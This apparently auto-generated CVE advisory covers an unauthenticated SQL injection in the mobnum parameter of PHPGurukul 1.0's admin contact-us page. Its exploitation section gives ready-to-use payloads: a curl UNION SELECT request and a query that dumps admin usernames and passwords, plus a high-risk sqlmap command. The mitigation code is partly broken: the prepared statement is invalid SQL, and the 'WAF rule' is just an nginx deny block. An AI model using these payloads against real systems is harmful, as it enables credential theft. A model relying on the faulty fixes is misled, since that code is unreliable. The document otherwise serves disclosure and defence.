How the CVE Works:
The vulnerability exists in `/admin/contact-us.php` due to improper sanitization of the `mobnum` parameter. Attackers can inject malicious SQL queries through this parameter, manipulating database operations. The system fails to apply prepared statements or input validation, allowing unauthorized access to sensitive data like admin credentials or student records. Remote exploitation is possible without authentication, making this critical. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms network-based attacks with low complexity.
DailyCVE Form:
Platform: PHPGurukul
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/06/2025
What Undercode Say:
Exploitation:
1. Craft Payload:
' OR 1=1-- -
2. Exploit URL:
curl -X GET "http://target.com/admin/contact-us.php?mobnum=' UNION SELECT 1,2,3,4,5-- -"
3. Dump Data:
' UNION SELECT username,password,3,4,5 FROM admin-- -
Protection:
1. Input Sanitization:
$mobnum = mysqli_real_escape_string($conn, $_GET['mobnum']);
2. Prepared Statements:
$stmt = $conn->prepare("SELECT FROM contacts WHERE mobnum = ?");
$stmt->bind_param("s", $_GET['mobnum']);
3. WAF Rules:
location /admin/ {
deny all;
}
Detection:
1. SQLMap:
sqlmap -u "http://target.com/admin/contact-us.php?mobnum=1" --risk=3 --level=5
2. Log Analysis:
grep "union.select" /var/log/apache2/access.log
Analytics:
- Attack Surface: Remote, unauthenticated.
- Impact: Data leakage, system compromise.
- Patch Status: No official fix. Mitigate via code hardening.
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
